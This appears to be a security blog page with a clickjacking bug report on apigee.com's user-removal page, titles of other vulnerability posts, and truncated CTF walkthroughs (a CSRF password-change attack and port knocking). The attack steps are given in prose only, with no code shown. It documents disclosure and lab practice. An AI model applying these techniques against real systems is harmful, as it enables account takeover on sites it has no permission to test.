Posts

Google(Apigee.com) ClickJacking Vulnerability

Image
Hi folks, 

This post is about one of my recent finding in apigee.com which was acquire by google in 2016. So i was monitoring request and responses, i noticed the following endpoint which has X-frame-options response header missing as shown in the below image.

https://apigee.com/platform/<orgnization_name>/users/<user_email>



So i quickly visited the page and there is a option to remove the user as shown in the below image.



In this case if the attacker is inside the origination he can easily trick the administrator to remove other users. 

Working POC:




Response from the google



Sad story :p 
Thanks for reading ;) 

Quantopian Authentication bypass vulnerability

Image

Snyk privilege escalation vulnerability

Image

Stripe privilege escalation vulnerability

Image

Ldesk XSS Vulnerability

Image

SecOS: 1 Walkthrough

Image
Hi guys i found another awesome CTF on vulnhub so let's walkthrough the Secos
Nmap :
Result of nmap shows two ports are open. Let's try to access port 8081.

Looks cool ! let's explore website but before open burpsuite and spider this host so that burp can capture some directories. 

So burp caught a page called hint. Let's visit this page.
As always it shows nothing at the front so let's check source code 

We got three hints, after looking at third hint i quickly goto signup option and created a account and logged in with the same account. Digging around i noticed three important points .
Administrator: Spiderman Change password option: Message option: Now we can understand hints simply saying that : We have you conduct a CSRF attack against the administrator i.e spiderman
Let's create a form for CSRF attack and the form should auto-submit so as soon as spiderman visits the page his password will be changed.

Save this form to /var/www directory and start apache server. w…

Lord of the root CTF walkthrough

Image
Hi Guys, today we will walkthrough the Lord of the root CTF challenge. You can find this interesting challenge Here. As stated by the author our goal is to root the box and find out the flag.txt file so let's start ;)
As always our first task is to do strong enumeration so let's start with nmap to check for different services and ports running on target machine.

Nmap shows only port 22 is open let's access it and see if we get any hint to move further.

Basically it gives us the hint for port knocking on port 1,2,3. There are many ways for port knocking but we will use following simple shell script.

Let's run this script for our target IP and ports.

After that let's again run nmap and check for open ports.

As a result of port knocking we got another open port i.e port 1337. Sounds good ? let's access it.

So now let's run nikto to get some juicy information about the target.

But unfortunately nikto shows nothing important. Next i checked the source code for further hi…